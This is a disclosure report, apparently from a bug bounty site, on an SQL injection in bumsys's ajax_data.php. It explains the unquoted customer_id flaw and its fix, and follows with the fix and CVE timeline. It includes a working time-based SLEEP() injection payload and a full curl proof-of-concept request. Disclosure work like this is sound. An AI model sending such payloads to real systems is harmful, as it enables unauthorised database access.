SQL Injection in 'core/ajax/ajax_data.php' in unilogies/bumsys


Reported on

Feb 28th 2023


There exists an SQL injection affecting the customer_id parameter located in the file core/ajax/ajax_data.php

Let's take a look at the following code: https://github.com/unilogies/bumsys/blob/9dc2de204116297a7e528c38bc3b1e89bf40f907/core/ajax/ajax_data.php#L537

                    where stock_product_id = {$product_id} and sales_customer_id = {$customer_id} and product_stock.is_trash = 0

The core problem is that, even though the function safe_input() is used in an effort to sanitize the customer_id variable, as seen here https://github.com/unilogies/bumsys/blob/9dc2de204116297a7e528c38bc3b1e89bf40f907/core/ajax/ajax_data.php#L447

    $customer_id = isset($_GET["customer_id"]) ? safe_input($_GET["customer_id"]) : "";

The query itself however, assumes customer_id is always an integer, but this isnt enforced by quotes. Thus allowing us to inject SQL statements without ever needing to inject a quote.



                    where stock_product_id = {$product_id} and sales_customer_id = {$customer_id} and product_stock.is_trash = 0


                    where stock_product_id = '{$product_id}' and sales_customer_id = '{$customer_id}' and product_stock.is_trash = 0

Proof of Concept

Make a GET-request to http://bumsys.local/info?module=data&page=productDetailsForReturn&product_id=2&customer_id=0+OR+(SELECT+SLEEP(1)) with a valid session and a valid CSRF-token and observe the delay introduced by calling SLEEP().

curl -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0' -H 'Connection: keep-alive' -H 'Cookie: eid=1; __5604118335cb0000a84ea1f5b9befc7b8de1bc72=9vrsravv229bb68gm7ejpldhoj;' -H 'X-CSRF-TOKEN: 5f185b523d036a55a162dbf63d8b45b600275e92' --url "http://bumsys.local/info?module=data&page=productDetailsForReturn&product_id=2&customer_id=0+OR+(SELECT+SLEEP(1))"


Authenticated users are able to disclose the contents of the database.

We are processing your report and will contact the unilogies/bumsys team within 24 hours. 23 days ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 22 days ago
Khurshid Alam validated this vulnerability 21 days ago

Good finding. Will fix soon. Thank you

TsarSec has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Khurshid Alam marked this as fixed in v2.0.2 with commit 6a328e 18 days ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability 18 days ago
Khurshid Alam
18 days ago


@admin, please assign a CVE.

Ben Harvie
10 days ago


CVE assigned as requested:)

to join this conversation